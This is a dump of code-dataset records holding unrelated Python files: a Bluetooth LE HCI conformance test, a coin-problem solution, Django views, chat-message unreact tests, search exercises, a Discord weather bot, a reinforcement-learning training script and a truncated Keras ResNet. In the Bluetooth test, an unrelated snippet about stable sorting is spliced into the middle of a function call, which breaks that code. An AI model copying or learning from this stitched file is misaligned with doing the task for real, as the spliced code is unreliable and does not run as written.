htole16\n\nCONN_TIMEOUT_MS = 10000\n\n\nclass HCIVendorWriteLocalMaxRxOctets(btcmd.HCIVendorCommand,\n btcmd.CmdCompltEvtParamUnpacker):\n ocf = 0x85\n\n def __init__(self, local_max_rx_octets):\n super(HCIVendorWriteLocalMaxRxOctets, self).__init__()\n self.local_max_rx_octets = local_max_rx_octets\n\n def pack_param(self):\n return ''.join((htole16(self.local_max_rx_octets)))\n\nbtevt.register_cmd_complt_evt(HCIVendorWriteLocalMaxRxOctets)\n\n\nclass IUT(HCIDataTransWorker):\n def main(self):\n helper = LEHelper(self.sock)\n\n helper.reset()\n cmd = btcmd.HCILEWriteSuggestedDefaultDataLength(200, (200+14)*8)\n helper.send_hci_cmd_wait_cmd_complt_check_status(cmd)\n\n helper.start_advertising(0xA0)\n evt = helper.wait_connection_complete()\n if evt.status != 0:\n raise bterr.TestError(\n 'connection fail: status: 0x{:02x}'.format(evt.status))\n self.log.info('connect to %s', bytes2str(evt.peer_addr))\n conn_handle = evt.conn_handle\n helper.wait_le_event(bluez.EVT_LE_DATA_LEN_CHANGE)\n\n self.send(conn_handle)\n\n helper.wait_le_event(bluez.EVT_LE_DATA_LEN_CHANGE)\n self.wait() # Wait lower tester to finish data length update\n\n # Send ACL data\n self.test_acl_trans_send(CONN_TIMEOUT_MS / 1000)\n\n helper.disconnect(conn_handle, 0x13)\n helper.wait_disconnection_complete(conn_handle)\n\n\nclass LowerTester(HCIDataTransWorker):\n def main(self):\n peer_addr = self.recv()\n\n helper = LEHelper(self.sock)\n\n helper.reset()\n cmd = HCIVendorWriteLocalMaxRxOctets(100)\n helper.send_hci_cmd_wait_cmd_complt_check_status(cmd)\n\n helper.create_connection_by_peer_addr(0, peer_addr, 60, 0, 200, 50)\n evt = helper.wait_connection_complete()\n if evt.status != 0:\n raise bterr.TestError(\n 'connection fail: status: 0x{:02x}'.format(evt.status))\n self.log.info('connect to %s', bytes2str(evt.peer_addr))\n conn_handle = evt.conn_handle\n helper.wait_le_event(bluez.EVT_LE_DATA_LEN_CHANGE)\n\n self.send(conn_handle)\n\n helper.set_data_len(conn_handle, 251)\n helper.wait_le_event(bluez.EVT_LE_DATA_LEN_CHANGE)\n self.signal() # Trigger next step\n\n self.test_acl_trans_recv(CONN_TIMEOUT_MS / 1000)\n\n helper.wait_disconnection_complete(conn_handle, CONN_TIMEOUT_MS)\n\n\nclass TestManager(HCIDataTransCoordinator):\n def main(self):\n self.lt.send(self.iut.bd_addr)\n\n send_conn_handle = self.iut.recv()\n recv_conn_handle = self.lt.recv()\n\n # Wait lower tester data length update\n self.lt.wait()\n self.iut.signal()\n\n acl_list = self.create_test_acl_data(send_conn_handle, 1, 251)\n succeeded = self.test_acl_trans(self.iut, 
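# The reducer above leans on Python's stable sort: sorting by the least
# significant key first, then re-sorting by each more significant key, is
# equivalent to one multi-key sort. Small demonstration with made-up tuples:
rows = [('b', 2, 5), ('a', 2, 5), ('a', 1, 9)]
rows.sort(key=lambda r: r[0])                 # least significant: name
rows.sort(key=lambda r: r[1])                 # then count, ascending
rows.sort(key=lambda r: r[2], reverse=True)   # most significant: score desc
assert rows == [('a', 1, 9), ('a', 2, 5), ('b', 2, 5)]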
self.lt, recv_conn_handle,\n acl_list, CONN_TIMEOUT_MS / 1000)\n\n if succeeded:\n return 0\n return 1\n\n\nbluetest = {\n 'coordinator': TestManager,\n 'worker': [\n ('iut', IUT),\n ('lt', LowerTester)\n ]\n}\n\n\nif __name__ == \"__main__\":\n bluetool.log_to_stream()\n bluetool.run_config(bluetest, [0, 1])\n","sub_path":"test/ts/TP_CON_SLA_BV-37-C.py","file_name":"TP_CON_SLA_BV-37-C.py","file_ext":"py","file_size_in_byte":3826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"650719065","text":"T=int(input())\r\nfor case_id in range(1,T+1):\r\n C,D,V = map(int,input().split())\r\n coins = list(map(int,input().split()))\r\n '''req = [1]\r\n while req[-1]*(D+1) <= V:\r\n req.append(req[-1]*(D+1))\r\n print(req)'''\r\n\r\n ans,do = 0,0\r\n while do < V:\r\n if len(coins)>0 and coins[0] <= do+1:\r\n do = C*coins[0] + do\r\n coins.pop(0)\r\n else:\r\n ans += 1\r\n do = C*(do+1) + do\r\n\r\n print('Case #%d: %d' % (case_id, ans))\r\n import sys\r\n print('Case #%d: %d' % (case_id, ans), file=sys.stderr)\r\n","sub_path":"solutions_5646553574277120_1/Python/Pred4c3/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"579717380","text":"from django.shortcuts import render\nfrom django import forms\nfrom django.forms import CharField, IntegerField\n\n# Create your views here.\ntasks=[\n \"check email\",\n \"send money\",\n \"give rent\"\n]\nclass NewTask(forms.Form):\n addtask=CharField(label=\" Add Task :\",max_length=64)\n priority=IntegerField(label=\"Priority :\",min_value=2,max_value=17)\n\n\ndef index(request):\n return render(request,\"taskapp/index.html\",{\n \"tasks\":tasks\n })\n\ndef add(request):\n form=NewTask()\n return render(request,\"taskapp/add.html\",{\n \"form\":form\n })","sub_path":"first_django/taskapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"605668644","text":"'''Test message_unreact function'''\n# pylint: disable=W0622, W0401, W0614, C0103, W0621\nfrom ._include import *\n\ndef message_flags(msg_id, all_msg):\n '''check if message is reacted'''\n flag = 0\n for msg in all_msg:\n if msg['message_id'] == msg_id:\n flag = 1\n if msg['reacts'] != 1:\n flag = 2\n break\n break\n return flag\n\ndef test_channel_invalid_token():\n '''Invalid Token'''\n db.reset_DB()\n with pytest.raises(AccessError):\n message_unreact(None, None, 1)\n\ndef test_channel_invalid_message_id(d):\n '''Invalid message ID'''\n db.reset_DB()\n dict = json.loads(auth_register(d['email'], d['psw'], d['f_name'], d['l_name']))\n with pytest.raises(ValueError):\n message_unreact(dict['token'], None, 1)\n\n@pytest.mark.parametrize(\"react_id\", [4, 2, -1, 'Apple', ' ', None])\ndef test_channel_invalid_react_id(d, react_id):\n '''Invalid react ID'''\n db.reset_DB()\n dict = json.loads(auth_register(d['email'], d['psw'], d['f_name'], d['l_name']))\n channel_id = json.loads(channels_create(dict['token'], 'Test_Channel', True))['channel_id']\n message_id = json.loads(message_send(dict['token'], channel_id, \"Random Message\"))['message_id']\n with pytest.raises(ValueError):\n message_unreact(dict['token'], message_id, react_id)\n\ndef test_message_unreact_successful(d):\n '''Message unreact successful'''\n db.reset_DB()\n dict = json.loads(auth_register(d['email'], d['psw'], d['f_name'], d['l_name']))\n channel_id = 
json.loads(channels_create(dict['token'], 'Test_Channel', True))['channel_id']\n message_id = json.loads(message_send(dict['token'], channel_id, \"Hi Green\"))['message_id']\n\n data = db.load_DB()\n message_react(dict['token'], message_id, '1')\n data = db.load_DB()\n message_unreact(dict['token'], message_id, '1')\n data = db.load_DB()\n assert message_flags(message_id, data['messages']) == 2\n","sub_path":"server/message_unreact_test.py","file_name":"message_unreact_test.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"169399062","text":"\"\"\"Exercises on search algorithms.\n\"\"\"\n\n\ndef linear_search(l, v):\n \"\"\"Implementation of sequential search.\n\n This is the naive algorithm for searching in lists (or arrays), see\n Wikipedia_. Its advantage is that it also works for unsorted lists.\n\n The function returns the index of the sought value `v` in the list `l`. If\n the sought value `v` is not found in the list `l`, the exception\n `ValueError` is raised instead.\n\n .. _Wikipedia: https://en.wikipedia.org/wiki/Linear_search#Basic_algorithm\n \"\"\"\n\n for i in range(0, len(l)):\n if l[i] == v:\n return i\n raise ValueError\n\n\ndef binary_search(l, v):\n \"\"\"Implementation of binary search.\n\n This is the classic algorithm for searching in sorted lists (or\n arrays), see Wikipedia_.\n\n The function returns the index of the sought value `v` in the list `l`. If\n the sought value `v` is not found in the list `l`, the exception\n `ValueError` is raised instead.\n\n .. _Wikipedia: https://en.wikipedia.org/wiki/Binary_search_algorithm#Algorith\n \"\"\"\n\n min = 0\n max = len(l) - 1\n while True:\n if max < min:\n raise ValueError\n m = (min + max) // 2\n if l[m] < v:\n min = m + 1\n elif l[m] > v:\n max = m - 1\n else:\n return m\n","sub_path":"exercises/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"629534643","text":"from discord import Embed, Colour\nfrom geopy.geocoders import Nominatim\nimport re\nimport datetime\n\n\ndef get_output(w_text):\n # Adds the appropriate weather emoji to w_text\n \n w_low = w_text.lower()\n \n if \"tornado\" in w_low:\n return \"🌪️ \" + w_text\n \n if any(x in w_low for x in [\"hurricane\", \"tropical\"]):\n return \"🌀 \" + w_text\n \n if any(x in w_low for x in [\"snow\", \"flurries\", \"hail\"]):\n return \"🌨️ \" + w_text\n \n if \"thunder\" in w_low:\n return \"⛈️ \" + w_text\n \n if any(x in w_low for x in [\"rain\", \"drizzle\", \"showers\", \"sleet\"]):\n return \"🌧️ \" + w_text\n \n if \"cold\" in w_low:\n return \"❄️ \" + w_text\n \n if any(x in w_low for x in [\"windy\", \"blustery\", \"breezy\"]):\n return \"🌬️ \" + w_text\n \n if \"mostly cloudy\" in w_low:\n return \"⛅ \" + w_text\n \n if any(x in w_low for x in [\"partly cloudy\", \"scattered clouds\",\n \"few clouds\", \"broken clouds\"]):\n return \"🌤️ \" + w_text\n \n if any(x in w_low for x in [\"cloudy\", \"clouds\"]):\n return \"☁️ \" + w_text\n \n if \"fair\" in w_low:\n return \"🌄 \" + w_text\n \n if any(x in w_low for x in [\"hot\", \"sunny\", \"clear\"]):\n return \"☀️ \" + w_text\n \n if any(x in w_low for x in [\"dust\", \"foggy\", \"haze\", \"smoky\"]):\n return \"️🌫️ \" + w_text\n \n # No emoji for that text, return text\n return w_text\n\n\ndef f_to_c(f):\n return int((int(f) - 32) / 1.8)\n\n\ndef c_to_f(c):\n return int((int(c) * 1.8) + 
32)\n\n\ndef c_to_k(c):\n return int(int(c) + 273)\n\n\ndef k_to_c(k):\n return int(int(k) - 273)\n\n\ndef f_to_k(f):\n return c_to_k(f_to_c(int(f)))\n\n\ndef k_to_f(k):\n return c_to_f(k_to_c(int(k)))\n\n\nclass TempConvert:\n def __init__(self, client):\n self.client = client\n\n self.name = \"tempconvert\"\n self.aliases = [\n \"tconvert\",\n \"tempcon\"\n ]\n\n self.category = \"Utilities\"\n self.perm_level = 0\n self.description = \"Converts between Fahrenheit, Celsius and \" \\\n \"Kelvin.\"\n self.usage = \"tempconvert <temperature> <from_type> <to_type>\"\n\n async def run(self, _, message, *args):\n if len(args) == 0:\n return await self.client.errors.MissingArgs(\n \"temperature\"\n ).send(\n message.channel\n )\n\n self.client.args_parser.get_args(\n message,\n *args\n )\n\n if len(args) < 2:\n return await self.client.errors.MissingArgs(\n \"from_type\"\n ).send(\n message.channel\n )\n\n if len(args) < 3:\n return await self.client.errors.MissingArgs(\n \"to_type\"\n ).send(\n message.channel\n )\n\n temp, from_type, to_type, *_ = args\n\n types = [\"Fahrenheit\", \"Celsius\", \"Kelvin\"]\n\n try:\n m = int(args[0])\n except ValueError:\n return await self.client.errors.InvalidArgs(\n args[0],\n \"temperature\"\n ).send(message.channel)\n\n args_1_l = args[1].lower()\n \n args_2_l = args[2].lower()\n\n f = next(\n (\n x for x in types\n if x.lower() == args_1_l or x.lower()[0] == args_1_l[0]\n ), None\n )\n \n t = next(\n (\n x for x in types\n if x.lower() == args_2_l or x.lower()[0] == args_2_l[0]\n ), None\n )\n\n if not f:\n # Invalid from type\n return await self.client.errors.InvalidArgs(\n args[1],\n \"from_type\"\n ).send(message.channel)\n if not t:\n # Invalid to type\n return await self.client.errors.InvalidArgs(\n args[2],\n \"to_type\"\n ).send(message.channel)\n if f == t:\n # Same in as out\n return await self.client.errors.UnchangedOutput(\n str(f),\n str(t)\n ).send(message.channel)\n\n if f == \"Fahrenheit\":\n if t == \"Celsius\":\n out_val = f_to_c(m)\n else:\n out_val = f_to_k(m)\n elif f == \"Celsius\":\n if t == \"Fahrenheit\":\n out_val = c_to_f(m)\n else:\n out_val = c_to_k(m)\n else:\n if t == \"Celsius\":\n out_val = k_to_c(m)\n else:\n out_val = k_to_f(m)\n\n await message.channel.send(\n embed=Embed(\n title=\"Converted!\",\n type=\"rich\",\n colour=Colour.from_rgb(234, 111, 255)\n ).add_field(\n name=\"Input\",\n value=\"{:,}{}{}\".format(\n m,\n \"\" if (f == \"Kelvin\") else \"°\",\n f[0]\n ),\n inline=True\n ).add_field(\n name=\"Output\",\n value=\"{:,}{}{}\".format(\n out_val,\n \"\" if (t == \"Kelvin\") else \"°\",\n t[0]\n ),\n inline=True\n )\n )\n\n\nclass Weather:\n @staticmethod\n def get_weather_embed(r=None):\n \n if not r:\n # Avoid a mutable default argument\n r = {}\n \n # Returns an Embed representing the weather passed\n main = r[\"main\"]\n weather = r[\"weather\"]\n coord = r[\"coord\"]\n sys = r[\"sys\"]\n\n # Make sure we get the temps in both F and C\n tc = k_to_c(main[\"temp\"])\n tf = c_to_f(tc)\n min_c = k_to_c(main[\"temp_min\"])\n min_f = c_to_f(min_c)\n max_c = k_to_c(main[\"temp_max\"])\n max_f = c_to_f(max_c)\n lat = coord[\"lat\"]\n lon = coord[\"lon\"]\n \n place = r.get(\"name\", lat)\n country = sys.get(\"country\", lon)\n flag = f\":flag_{country.lower()}:\" if country else \"\"\n \n # Gather the formatted conditions\n condition_list = []\n for x, y in enumerate(weather):\n d = y[\"description\"]\n if x == 0:\n d = d.capitalize()\n condition_list.append(get_output(d))\n condition = \", \".join(condition_list)\n\n return Embed(\n title=\"Weather for 
{}, {} {}\".format(place, country, flag),\n type=\"rich\",\n colour=Colour.from_rgb(234, 111, 255)\n ).add_field(\n name=\"Current Temperature\",\n value=\"{}°C ({}°F)\".format(tc, tf),\n inline=True\n ).add_field(\n name=\"Condition\",\n value=condition,\n inline=True\n ).add_field(\n name=\"Daily High\",\n value=\"High of {}°C ({}°F)\".format(max_c, max_f),\n ).add_field(\n name=\"Daily Low\",\n value=\"Low of {}°C ({}°F)\".format(min_c, min_f),\n inline=True\n ).set_footer(\n text=f\"Lat: {lat} | Lon: {lon} | Powered by OpenWeatherMap\"\n if (place != lat or country != lon) else \"Powered by\"\n \" OpenWeatherMap\"\n )\n\n def __init__(self, client):\n self.client = client\n\n self.name = \"weather\"\n self.aliases = [\n \"currentweather\"\n ]\n\n self.category = \"Utilities\"\n self.perm_level = 0\n self.description = \"Gets some weather.\"\n self.usage = \"weather \"\n self.geo = Nominatim(user_agent=\"TFR-Bot\")\n self.key = self.client.config.openweathermap_key\n\n async def run(self, _, message, *args):\n if len(args) == 0:\n return await self.client.errors.MissingArgs(\n \"place_name\"\n ).send(\n message.channel\n )\n\n self.client.args_parser.get_args(\n message,\n *args\n )\n\n place_name = \" \".join(args)\n\n # Strip anything that's non alphanumeric or a space\n place_name = re.sub(r'([^\\s\\w]|_)+', '', str(place_name))\n location = self.geo.geocode(str(place_name))\n\n if location is None:\n return await self.client.errors.PlaceNotFound(\n place_name\n ).send(\n message.channel\n )\n\n # Just want the current weather\n r = await self.client.DL.async_json(\n \"http://api.openweathermap.org/data/2.5/weather?\"\n \"appid={}&lat={}&lon={}\".format(\n self.key,\n location.latitude,\n location.longitude\n )\n )\n \n embed = self.get_weather_embed(r)\n\n await message.channel.send(\n embed=embed\n )\n\n\nclass Forecast:\n @staticmethod\n def get_weather_text(r):\n # Returns a string representing the weather passed\n main = r[\"main\"]\n weath = r[\"weather\"]\n\n # Make sure we get the temps in both F and C\n tc = k_to_c(main[\"temp\"])\n tf = c_to_f(tc)\n min_c = k_to_c(main[\"temp_min\"])\n min_f = c_to_f(min_c)\n max_c = k_to_c(main[\"temp_max\"])\n max_f = c_to_f(max_c)\n\n # Gather the formatted conditions\n condition_list = []\n for x, y in enumerate(weath):\n d = y[\"description\"]\n if x == 0:\n d = d.capitalize()\n condition_list.append(get_output(d))\n condition = \", \".join(condition_list)\n\n # Format the description\n desc = \"{}°C ({}°F),\\n\\n{},\\n\\nHigh of {}°C ({}°F) - Low of\" \\\n \" {}°C ({}°F)\\n\\n\".format(\n tc, tf,\n condition,\n max_c, max_f,\n min_c, min_f\n )\n\n return desc\n\n def __init__(self, client):\n self.client = client\n\n self.name = \"forecast\"\n self.aliases = [\n \"weatherforecast\"\n ]\n\n self.category = \"Utilities\"\n self.perm_level = 0\n self.description = \"Gets some weather, for 5 days.\"\n self.usage = \"forecast \"\n self.geo = Nominatim(user_agent=\"TFR-Bot\")\n self.key = self.client.config.openweathermap_key\n\n async def run(self, _, message, *args):\n if len(args) == 0:\n return await self.client.errors.MissingArgs(\n \"place_name\"\n ).send(\n message.channel\n )\n\n self.client.args_parser.get_args(\n message,\n *args\n )\n\n place_name = \" \".join(args)\n\n # Strip anything that's non alphanumeric or a space\n place_name = re.sub(r'([^\\s\\w]|_)+', '', str(place_name))\n location = self.geo.geocode(str(place_name))\n\n if location is None:\n return await self.client.errors.PlaceNotFound(\n place_name\n ).send(\n 
message.channel\n )\n\n # We want the 5-day forecast at this point\n r = await self.client.DL.async_json(\n \"http://api.openweathermap.org/data/2.5/forecast?appid={}\"\n \"&lat={}&lon={}\".format(\n self.key,\n location.latitude,\n location.longitude\n )\n )\n\n try:\n city = r[\"city\"]\n city_name = city[\"name\"]\n country = city[\"country\"]\n flag = \":flag_{}:\".format(str(country).lower())\n\n title = \"5 Day Forecast for {}, {} {}\".format(\n city_name,\n country,\n flag\n )\n except KeyError:\n title = \"5 Day Forecast for {}\".format(location)\n\n days = {}\n for x in r[\"list\"]:\n # Check if the day exists - if not, we set up a pre-day\n day = x[\"dt_txt\"].split(\" \")[0]\n is_noon = \"12:00:00\" in x[\"dt_txt\"]\n if day not in days:\n days[day] = {\n \"main\": x[\"main\"],\n \"weather\": x[\"weather\"],\n \"day_count\": 1\n }\n continue\n # Day is in the list - let's check values\n if x[\"main\"][\"temp_min\"] < days[day][\"main\"][\"temp_min\"]:\n days[day][\"main\"][\"temp_min\"] = x[\"main\"][\"temp_min\"]\n if x[\"main\"][\"temp_max\"] > days[day][\"main\"][\"temp_max\"]:\n days[day][\"main\"][\"temp_max\"] = x[\"main\"][\"temp_max\"]\n # Add the temp\n days[day][\"main\"][\"temp\"] += x[\"main\"][\"temp\"]\n days[day][\"day_count\"] += 1\n # Set the weather data if is noon\n if is_noon:\n days[day][\"weather\"] = x[\"weather\"]\n\n embed = Embed(\n type=\"rich\",\n title=title,\n color=Colour.from_rgb(234, 111, 255)\n ).set_footer(\n text=\"Powered by OpenWeatherMap\"\n )\n\n for day in sorted(days):\n # Average the temp, strip weather duplicates\n days[day][\"main\"][\"temp\"] /= days[day][\"day_count\"]\n embed.add_field(\n name=(\n datetime.datetime.strptime(day, \"%Y-%m-%d\")\n .strftime(\"%A, %b %d, %Y\") + \":\"\n ),\n value=self.get_weather_text(days[day]),\n inline=False\n )\n\n await message.channel.send(embed=embed)\n\n\ndef setup(client):\n client.command_handler.add_commands(\n TempConvert(client),\n Weather(client),\n Forecast(client)\n )\n","sub_path":"Extensions/Weather.py","file_name":"Weather.py","file_ext":"py","file_size_in_byte":13723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"65946667","text":"import gym\nimport numpy as np\nimport pybulletgym\nfrom SQL_torch import Agent\nfrom utils import plot_learning_curve\nfrom gym import wrappers\nimport math\nfrom multigoal import MultiGoalEnv\nimport torch as T\nfrom plotter import QFPolicyPlotter\nfrom networks import MLPActorCritic, SamplingNetwork\n\n\n# env= MultiGoalEnv()\n# hid = 256\n# l =2\n# epochs=20\n# seed = 42\n# gamma =0.99\n\n# ac,ac_targ,sampler = svgd(lambda : gym.make(env) , actor_critic=MLPActorCritic, sampler=SamplingNetwork, ac_kwargs=dict(hidden_sizes=[hid]*l),\n# steps_per_epoch=100, replay_size=int(1e6),\n# polyak=0.995, pi_lr=1e-3, q_lr=1e-3, batch_size=100,noise_dim = 2, n_particles=16, start_steps=0, \n# update_after=1000, update_every=1, act_noise=0.1, num_test_episodes=10, \n# max_ep_len=30, save_freq=1, gamma=gamma, seed=seed, epochs=epochs)\n\n# lambda : gym.make(env) , actor_critic=MLPActorCritic, ac_kwargs=dict(hidden_sizes=[hid]*l),\n# steps_per_epoch=100, replay_size=int(1e6),\n# polyak=0.995, pi_lr=1e-3, q_lr=1e-3, batch_size=100,noise_dim = 2, n_particles=16, start_steps=0, \n# update_after=1000, update_every=1, act_noise=0.1, num_test_episodes=10, \n# max_ep_len=30, save_freq=1, gamma=gamma, seed=seed, epochs=epochs\n\nif __name__ == \"__main__\":\n \n env= MultiGoalEnv()\n hid = 256\n l =2\n epochs=20\n seed 
= 42\n gamma =0.99\n \n agent = Agent(lambda : gym.make(env) , actor_critic=MLPActorCritic, sampler=SamplingNetwork, ac_kwargs=dict(hidden_sizes=[hid]*l),\n steps_per_epoch=100, replay_size=int(1e6),\n polyak=0.995, pi_lr=1e-3, q_lr=1e-3, batch_size=100,noise_dim = 2, n_particles=16, start_steps=0, \n update_after=1000, update_every=1, act_noise=0.1, num_test_episodes=10, \n max_ep_len=30, save_freq=1, gamma=gamma, seed=seed, epochs=epochs)\n \n \n update_every=1\n update_after=50\n max_ep_len=30\n start_steps=0\n steps_per_epoch=100\n # Prepare for interaction with environment\n total_steps = steps_per_epoch * epochs\n \n \n \n o, ep_ret, ep_len = env.reset(), 0, 0\n\n # Main loop: collect experience in env and update/log each epoch\n \n for t in range(total_steps):\n \n # Until start_steps have elapsed, randomly sample actions\n # from a uniform distribution for better exploration. Afterwards, \n # use the learned policy (with some noise, via act_noise). \n if t > start_steps:\n a = agent.get_sample(o)\n else:\n a = env.action_space.sample()\n\n # Step the env\n o2, r, d, _ = env.step(a)\n ep_ret += r\n ep_len += 1\n #print(\"t=\",t,\"ep_ret=\",ep_ret, \"ep_len=\",ep_len)\n\n # Ignore the \"done\" signal if it comes from hitting the time\n # horizon (that is, when it's an artificial terminal signal\n # that isn't based on the agent's state)\n d = False if ep_len==max_ep_len else d\n\n # Store experience to replay buffer\n agent.replay_buffer.store(o, a, r, o2, d)\n\n # Super critical, easy to overlook step: make sure to update \n # most recent observation!\n o = o2\n\n # End of trajectory handling\n if d or (ep_len == max_ep_len):\n #logger.store(EpRet=ep_ret, EpLen=ep_len)\n o, ep_ret, ep_len = env.reset(), 0, 0\n \n print(t)\n # Update handling\n if t >= update_after and t % update_every == 0:\n batch = agent.replay_buffer.sample_batch(agent.batch_size)\n #print(\"before updating..\")\n agent.learn(data=batch)\n #print(\"after updating..\")\n\n # End of epoch handling\n if (t+1) % steps_per_epoch == 0:\n epoch = (t+1) // steps_per_epoch\n print(\"epoch=\",epoch)\n agent.plot_paths(epoch)\n\n # Save model\n #if (epoch % save_freq == 0) or (epoch == epochs):\n #logger.save_state({'env': env}, None)\n\n # Test the performance of the deterministic version of the agent.\n # agent.test_agent()\n \n\n\n\n\n# ac,ac_targ,sampler = svgd(lambda : gym.make(env) , actor_critic=MLPActorCritic, ac_kwargs=dict(hidden_sizes=[hid]*l), \n# gamma=gamma, seed=seed, epochs=epochs)\n\n\n\n# plotter = QFPolicyPlotter(qf = ac.q, policy=sampler, obs_lst=[[0,0],[-2.5,-2.5],[2.5,2.5],[-2.5,2.5],[2.5,-2.5]], default_action =[np.nan,np.nan], n_samples=100)\n# plotter.draw()\n\n\n\n\n# def plot(agent):\n# paths = []\n# actions_plot=[]\n# env = MultiGoalEnv()\n# n_games = 50\n# max_episode_length = 20\n# for i in range(n_games):\n# observation = env.reset()\n# episode_length = 0\n# done = False\n# score = 0\n# path = {'infos':{'pos':[]}}\n# while not done:\n# env.render()\n# #print('state: ', np.squeeze(observation))\n# action = agent.get_action_svgd(T.from_numpy(observation).unsqueeze(0).double()).squeeze().detach().numpy()\n\n# #print('ac: ', action[0].cpu().detach().numpy())\n# observation_, reward, done, info = env.step(action)\n# path['infos']['pos'].append(observation)\n \n# if episode_length == max_episode_length:\n# done = True\n# episode_length += 1\n \n# #print('re:', reward)\n# score += reward\n# observation = observation_\n# paths.append(path)\n \n# score = score / 200\n# score_history.append(score)\n# 
avg_score = np.mean(score_history[-20:])\n \n# env.render_rollouts(paths, fout=\"test_%d.png\" % i)\n\n\n# if __name__ == '__main__':\n# env = MultiGoalEnv()\n# # print(env.observation_space.shape)\n# # print(env.action_space.shape)\n# agent = Agent(state_dim=env.observation_space.shape[0], env=env,\n# action_dim=env.action_space.shape[0], n_particles=32, batch_size=100, reward_scale=0.1, max_action=env.action_space.high)\n# n_games = 50\n# # uncomment this line and do a mkdir tmp && mkdir video if you want to\n# # record video of the agent playing the game.\n# #env = wrappers.Monitor(env, 'tmp/video', video_callable=lambda episode_id: True, force=True)\n# filename = 'inverted_pendulum.png'\n# figure_file = 'plots/' + filename\n\n# #print(env.action_space.high)\n \n# best_score = env.reward_range[0]\n# score_history = []\n# load_checkpoint = False\n \n# max_episode_length = 100\n\n# if load_checkpoint:\n# agent.load_models()\n# env.render(mode='human')\n\n# for i in range(n_games):\n \n# #observation = env.reset(init_state=[2.5, 2.5])\n# observation = env.reset()\n# episode_length = 0\n \n# done = False\n# score = 0\n \n# while not done:\n# #env.render()\n# #print('state: ', np.squeeze(observation))\n# action = agent.get_action_svgd(T.from_numpy(observation).unsqueeze(0)).squeeze().detach().numpy()\n \n \n# #print('ac: ', np.squeeze(action))\n# observation_, reward, done, info = env.step(action)\n \n# if episode_length == max_episode_length:\n# done = True\n# #print(episode_length)\n# #print('re:', reward)\n# #print('Q: ', np.squeeze(env.get_Q()))\n# score += reward\n# agent.remember(observation, action, reward, observation_, done)\n# if not load_checkpoint:\n# agent.learn(episode_length)\n# observation = observation_\n# episode_length += 1\n\n \n# score = score \n# score_history.append(score)\n# avg_score = np.mean(score_history[-20:])\n \n# if avg_score > best_score:\n# best_score = avg_score\n# # if not load_checkpoint:\n# # agent.save_models()\n# print('episode ', i, 'score %.1f' % score, 'avg_score %.1f' % avg_score)\n \n# plot(agent)\n \n \n \n# #agent.actor.sample_normal(T.FloatTensor([2.5,2.5]).repeat([100,1]))[0].detach().numpy()\n \n# plotter = QFPolicyPlotter(qf = agent.Q_Network, agent=agent, obs_lst=[[-2.5,-2.5],[0,0],[2.5,2.5]], default_action =[np.nan,np.nan], n_samples=50)\n# plotter.draw()\n\n\n# env.close() \n \n \n\n \n \n","sub_path":"archive/version 1/main_SQL_multigoal.py","file_name":"main_SQL_multigoal.py","file_ext":"py","file_size_in_byte":8411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"453924388","text":"#!/usr/bin/env python\r\n# -*- coding:utf-8 -*-\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom keras import layers\r\nfrom keras.layers import Input, Add, Dense, Activation, ZeroPadding2D, \\\r\n BatchNormalization, Flatten, Conv2D, AveragePooling2D, MaxPooling2D, GlobalMaxPooling2D\r\nfrom keras.models import Model, load_model\r\nfrom keras.preprocessing import image\r\nfrom keras.utils import layer_utils\r\nfrom keras.utils.data_utils import get_file\r\nfrom keras.applications.imagenet_utils import preprocess_input\r\nfrom keras.utils.vis_utils import model_to_dot\r\nfrom keras.utils import plot_model\r\nfrom keras.initializers import glorot_uniform\r\nEPOCH = 20\r\nBATCH_SIZE = 16\r\n\r\nTEST_SIZE = 794\r\nTRAIN_SIZE = 4750\r\n\r\ntrain_name = 'train_single.tfrecords'\r\ntest_name = 'test_raw_64.tfrecords'\r\n\r\n\r\n# Identity module: identity_block\r\ndef identity_block(X, f, filters, stage, block):\r\n # Define the base layer names\r\n conv_name_base = \"stage_conv2d_\" + str(stage) + \"_branch_\" + block +\"_\"\r\n bn_name_base = \"stage_BNormal_\" + str(stage) + \"_branch_\" + block +\"_\"\r\n\r\n # Save the input value; it will be added back to the main path later\r\n X_shortcut = X\r\n\r\n # First component of the main path\r\n X = Conv2D(filters=filters, kernel_size=(f, f), strides=(1, 1), padding=\"same\",\r\n name=conv_name_base + \"2a\", kernel_initializer=glorot_uniform(seed=0))(X)\r\n X = BatchNormalization(axis=3, name=bn_name_base + \"2a\")(X)\r\n X = Activation(\"relu\")(X)\r\n\r\n # Second component of the main path\r\n #X = Conv2D(filters=filters, kernel_size=(f, f), strides=(1, 1), padding=\"same\",\r\n # name=conv_name_base + \"2b\", kernel_initializer=glorot_uniform(seed=0))(X)\r\n #X = BatchNormalization(axis=3, name=bn_name_base + \"2b\")(X)\r\n #X = Activation(\"relu\")(X)\r\n\r\n X = layers.add([X, X_shortcut])\r\n X = Activation(\"relu\")(X)\r\n return X\r\n\r\ndef ResNet(input_shape=(64, 64, 3), classes=12):\r\n # Define the input as a tensor of shape input_shape\r\n X_input = Input(input_shape)\r\n\r\n # Stage 1\r\n X = Conv2D(64, kernel_size=(1, 1), strides=(1, 1), name=\"Start_Conv1\", kernel_initializer=glorot_uniform(seed=0))(X_input)\r\n X = BatchNormalization(axis=3, name=\"Start_BN_conv1\")(X)\r\n X = Activation(\"relu\")(X)\r\n X = MaxPooling2D(pool_size=(3, 3), strides=(2, 2))(X)\r\n\r\n #stage 2\r\n X = identity_block(X, f=3, filters=64, stage=2, block=\"a\")\r\n X = identity_block(X, f=3, filters=64, stage=2, block=\"b\")\r\n \r\n X = Conv2D(128, kernel_size=(3, 3), strides=(2, 2), name=\"Mid_conv2\", kernel_initializer=glorot_uniform(seed=0))(X)\r\n X = 